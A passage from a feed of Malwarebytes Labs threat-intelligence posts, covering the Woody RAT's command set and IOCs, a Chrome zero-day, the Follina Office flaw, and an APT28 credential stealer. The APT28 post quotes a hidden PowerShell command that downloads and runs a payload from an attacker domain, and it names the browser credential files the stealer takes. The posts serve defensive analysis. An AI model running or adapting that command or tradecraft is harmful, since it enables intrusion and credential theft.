)knock request headers\n\n**submit **- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. [Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** - The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with "_CRY" then the malware proceeds to send the knock request again but if the C2 responds with "_ACK" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure9-600x117.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure9.png> \"\" )Command execution routine\n\n**_SET Commands**\n\n * **PING** - This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** - Unknown command\n * **EXIT** - Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then "_DAT" is appended to this data before it is AES encrypted and sent to the C2.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure10.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure10.png> \"\" )EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file. \n * **INFO** (Submit Information) - The INFO command is similar to the "submit" request above; this command sends the exact information to the C2 as sent by the "submit" request.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure11.png)INFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are:\n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure12-600x88.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure12.png> \"\" )INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs: \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure13-492x600.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure13.png> \"\" )SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character. \n * **DN_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure14.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure14.png> \"\" )Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/block.png)\n\n## IOCs\n\n**Woody** **Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited) \n\n\nThe post [Woody RAT: A new feature-rich malware spotted in the wild](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:25:52", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:25:52", "id": "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-05T15:58:36", "description": "Google has released version 103.0.5060.114 for Chrome, now available in the [Stable Desktop channel](<https://chromereleases.googleblog.com/2022/07/extended-stable-channel-update-for.html>) worldwide. The main goal of this new version is to patch CVE-2022-2294.\n\n[CVE-2022-2294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2294>) is a high severity heap-based buffer overflow weakness in the Web Real-Time Communications (WebRTC) component which is being exploited in the wild. This is the fourth Chrome zero-day to be patched in 2022.\n\n## Heap buffer overflow\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nA buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n\nThe heap is an area of memory made available use by the program. The program can request blocks of memory for its use within the heap. In order to allocate a block of some size, the program makes an explicit request by calling the heap allocation operation.\n\n## The vulnerability\n\nWebRTC on Chrome is the first true in-browser solution to real-time communications (RTC). It supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions. The technology is available on all modern browsers as well as on native clients for all major platforms.\n\nA WebRTC application will usually go through a common application flow. Access the media devices, open peer connections, discover peers, and start streaming. Since Google does not disclose details about the vulnerability until everyone has had ample opportunity to install the fix it is unclear in what stage the vulnerability exists.\n\n## How to protect yourself\n\nIf you\u2019re a Chrome user on Windows or Mac, you should update as soon as possible.\n\nThe easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time, given the severity of the vulnerability. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.\n\n![updating Chrome](https://blog.malwarebytes.com/wp-content/uploads/2022/07/updating-600x245.png)\n\nAfter the update the version should be 103.0.5060.114 or later.\n\n![Chrome is up to date](https://blog.malwarebytes.com/wp-content/uploads/2022/07/uptodate-600x250.png)\n\nSince WebRTC is a Chromium component, users of other Chromium based browsers may see a similar update.\n\nStay safe, everyone!\n\nThe post [Update now! Chrome patches ANOTHER zero-day vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-chrome-patches-another-zero-day-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-07-05T13:56:04", "type": "malwarebytes", "title": "Update now! Chrome patches ANOTHER zero-day vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-2294"], "modified": "2022-07-05T13:56:04", "id": "MALWAREBYTES:6E72426C60EECBEF071E305072060892", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-chrome-patches-another-zero-day-vulnerability/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-02T17:32:49", "description": "On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) for a zero-day remote code vulnerability, 'Follina', already being exploited in the wild via malicious Word documents.\n\n_**Q: What exactly is Follina?**_\n\nA: Follina is the nickname given to a new vulnerability discovered as a zero-day and identified as CVE-2022-30190. In technical terms it is a Remote Code Execution Vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).\n\n_**Q: But what does it mean, and is this a serious vulnerability?**_\n\nA: An attacker can send you a malicious Office document that will compromise your machine with malware when you open it. It is serious since it is already actively being exploited in the wild and doesn't require users to enable macros.\n\n**_Q: What is Microsoft doing about it?_**\n\nA: Microsoft has offered [mitigation steps](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) that disable the MSDT URL Protocol. However, users should proceed with caution because of possible conflicts and crashes with existing applications.\n\n_**Q: Does Malwarebytes protect against Follina?**_\n\nA: Yes, it does. Please see additional steps below based on your product to ensure you are protected.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/Follina_block.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Follina_block.png> \"\" )\n\n## How to add protection with Malwarebytes\n\nWe are working on releasing a new version of Anti-Exploit that won't require adding new shields and will provide more holistic protection. For immediate mitigation, please follow the instructions below.\n\n### Malwarebytes Premium (Consumer)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/MB4.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/MB4.gif> \"\" )\n\n### Malwarebytes Nebula (Enterprise)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/Nebula.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Nebula.gif> \"\" )\n\nThe post [FAQ: Mitigating Microsoft Office's 'Follina' zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T16:36:44", "type": "malwarebytes", "title": "FAQ: Mitigating Microsoft Office\u2019s \u2018Follina\u2019 zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T16:36:44", "id": "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "_**Update: Please see our [FAQ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) for the latest guidance and mitigation tips on Follina.**_\n\nOn Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.\n\nThe [mitigation](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) offered by Microsoft consists of an alternative method to unregister the MSDT URL Protocol. \nSeveral researchers have come across a novel attack that circumvents Microsoft's Protected View and anti-malware detection.\n\nThe attack vector uses the Word remote template feature to retrieve an HTML file from a remote webserver. It goes on to use the `ms-msdt` protocol URI scheme to load some code, and then execute some PowerShell.\n\nAll of the above methods are features, but if we tell you that put together this allows an attacker to remotely run code on your system by tricking you into clicking a link, that sounds quite disturbing doesn\u2019t it?\n\nWell, you'd be right to be concerned. That little sequence of features adds up to a zero-day flaw in Microsoft Office that is being abused in the wild to achieve arbitrary code execution on Windows systems. \n\nJerome Segura, Malwarebytes' Senior Director, Threat Intelligence:\n\n> This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros.\n\nThe most prominent researchers working on the issue have dubbed the vulnerability in Microsoft Office **Follina**, because a sample uploaded to VirusTotal included the area code for the Italian comune Follina.\n\nThe first researcher to find and report Follina used in the wild goes by the handle [@CrazymanArmy](<https://twitter.com/CrazymanArmy/status/1531120929321152512?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>). Our own analyst Hossein Jazi had also spotted the same maldoc, although at the time the remote template was down, leaving out a critical piece of the attack chain.\n\n> Our threat intel analyst [@h2jazi](<https://twitter.com/h2jazi?ref_src=twsrc%5Etfw>) had spotted a sample using the msdt.exe RCE back in April. \n \nAt the time, the remote template was already down and therefore full identification was not possible. <https://t.co/03UU2ClMhv>\n> \n> -- Malwarebytes Threat Intelligence (@MBThreatIntel) [May 30, 2022](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw>)\n\nIt was more recently made public again by [@nao_sec](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>).\n\n> Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.<https://t.co/hTdAfHOUx3> [pic.twitter.com/rVSb02ZTwt](<https://t.co/rVSb02ZTwt>)\n> \n> -- nao_sec (@nao_sec) [May 27, 2022](<https://twitter.com/nao_sec/status/1530196847679401984?ref_src=twsrc%5Etfw>)\n\n## Affected versions\n\nUnder normal circumstances, files from potentially unsafe locations are opened as read only or in Protected View. However, this warning can be easily bypassed by changing the document to a Rich Text Format (RTF) file. By doing so, the code can run without even opening the document via the preview tab in Explorer.\n\nWhile the research is ongoing and the info security community is testing and probing, we are receiving some mixed signals whether the latest, fully patched, version of Office 365 is vulnerable to this type of attack or not. Older versions are certainly vulnerable, which already makes it a problem with a huge attack surface.\n\nResearcher Kevin Beaumont [provides the example](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) where an attacker can send an email with this text as a hyperlink:\n \n \n ms-excel:ofv|u|https://blah.com/poc.xls\n\nAnd Outlook will allow the user to click the hyperlink and open the Excel document. Because the document isn\u2019t attached to the email, and the URI doesn\u2019t start with http or https, most email gateways are going to let that slide straight through as nothing appears malicious.\n\nAs we stated earlier, even looking at a specially crafted file in the preview pane of Windows Explorer could trigger the attack. Microsoft has been made aware of the issues and the possible consequences. While its first reaction was that there was no security issue, it seems this needs to be fixed.\n\n## Mitigation\n\nThere are a few things you can do to stop some or all of the \u201cfeatures\u201d used in this type of attack.\n\n### Unregister the ms-msdt protocol\n\nWill Dormann, a vulnerability analyst at the CERT/CC has [published a registry fix](<https://gist.github.com/wdormann/031962b9d388c90a518d2551be58ead7>) that will unregister the ms-msdt protocol.\n\nCopy and paste the text into a notepad document:\n\n * Click on **File**, then **Save As\u2026**\n * Save it to your Desktop, then name the file `disable_ms-msdt.reg` in the file name box.\n * Click **Save**, and close the notepad document.\n * Double-click the file `disable_ms-msdt.reg` on your desktop.\n\nNote, if you are prompted by User Account Control, select **Yes** or **Allow** so the fix can continue.\n\n * A message will appear about adding information into the registry, click **Yes** when prompted\n * A prompt should appear that the information was added successfully\n\n### Disable preview in Windows Explorer\n\nIf you have the preview pane enabled, you can:\n\n * Open File Explorer.\n * Click on **View** Tab.\n * Click on **Preview Pane** to hide it.\n\nThe post [Microsoft Office zero-day "Follina"\u2014it\u2019s not a bug, it\u2019s a feature! (It's a bug)](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:09:26", "type": "malwarebytes", "title": "Microsoft Office zero-day \u201cFollina\u201d\u2014it\u2019s not a bug, it\u2019s a feature! (It\u2019s a bug)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T18:09:26", "id": "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T14:35:47", "description": "_This blog post was authored by Hossein Jazi and Roberto Santos_.\n\nIn a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.\n\nAPT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and [US organizations](<https://blog.malwarebytes.com/reports/2021/07/beware-password-spraying-fancy-bears/>), including US nuclear facilities.\n\nOn June 20, 2022, Malwarebytes Threat Intelligence [identified](<https://twitter.com/h2jazi/status/1538957205210337280>) a document that had been weaponized with the [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by [Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). The discovery was also made [independently by CERT-UA](<https://cert.gov.ua/article/341128>).\n\nFollina is a recently-discovered zero-day exploit that uses the `ms-msdt` protocol to load malicious code from Word documents when they are opened. This is the first time we've observed APT28 using Follina in its operations. \n\n## The malicious document\n\nThe maldoc's filename, `Nuclear Terrorism A Very Real Threat.rtf`, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict. \n\nThe content of the document is an article from the [Atlantic Council](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) called "_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_" published on May 10 this year.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/lure.jpg)The lure asks "Will Putin use nuclear weapons in Ukraine?"\n\nThe maldoc is a docx file (pretending to be a RTF file) compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the `Document.xml.rels` file to retrieve a remote HTML file from the URL [http://kitten-268.frge.io/article.html](<https://www.virustotal.com/gui/url/9863b9b4ae9c555cd4dc30803000ea202f642a37321da2222fec9d51bce443b1>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/malicious-html-document.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/malicious-html-document.png> \"\" )The malicious HTML document\n\nThe HTML file uses a JavaScript call to `window.location.href` to load and execute an encoded PowerShell script using the `ms-msdt` MSProtocol URI scheme. The decoded script uses `cmd` to run PowerShell code that downloads and executes the final payload:\n \n \n \"C:\\WINDOWS\\system32\\cmd.exe\" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command \"& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile \"C:\\Users\\$ENV:UserName\\SQLite.Interop.dll\";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile \"C:\\Users\\$ENV:UserName\\docx.exe\";Start-Process \"C:\\Users\\$ENV:UserName\\docx.exe\"}\"\n\n## Payload Analysis\n\nThe final payload is a variant of a stealer APT28 has [used against targets in Ukraine](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>) before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup. \n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/image-6-600x283.png)In older versions of the stealer, a fake error message distracted users \n\nThe variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.\n\n[![A side-by-side comparison of two versions of the APT28 stealer](https://blog.malwarebytes.com/wp-content/uploads/2022/06/comparing-version-one-and-version-two-of-the-malicious-stealer.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/comparing-version-one-and-version-two-of-the-malicious-stealer.png> \"\" )A side-by-side comparison of two versions of the APT28 stealer\n\nAs with the previous variant, the stealer's main pupose is to steal data from several popular browsers.\n\n### Google Chrome and Microsoft Edge\n\nThe malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data`.\n\n[![Debugging session showing how attackers are capable of stealing credentials](https://blog.malwarebytes.com/wp-content/uploads/2022/06/debugging-session-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/debugging-session-1.png> \"\" )Debugging session showing how attackers are capable of stealing credentials\n\nIn a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies`. \n\n[![Code snippet in charge of cookies steal activity \$Google Chrome\$](https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing.png> \"\" )Cookie stealing code (Google Chrome)\n\nStolen cookies can sometimes be used to break into websites even if the username and password aren't saved to the browser.\n\nThe code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.\n\n### Firefox\n\nThis malware can also steal data from Firefox. It does this by iterating through every profile looking for the `cookies.sqlite` file that stores the cookies for each user.\n\n[![Cookie stealing in Firefox](https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing-firefox.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing-firefox.png> \"\" )Sysmon capturing access to cookies.sqlite file\n\nIn the case of passwords, the attackers attempt to steal `logins.json`, `key3.db`, `key4.db`, `cert8.db`, `cert9.db`, `signons.sqlite`.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/image-11.png)Attackers will grab also passwords from Firefox\n\nThese files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (`signons.sqlite`, `key3.db` and `cert8.db` are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.\n\n## Exfiltrating data\n\nThe malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.\n\n[![IMAP login event](https://blog.malwarebytes.com/wp-content/uploads/2022/06/imap-login-event.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/imap-login-event.png> \"\" )The IMAP login event\n\nThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.\n\nIt's likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.\n\nAlthough ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military 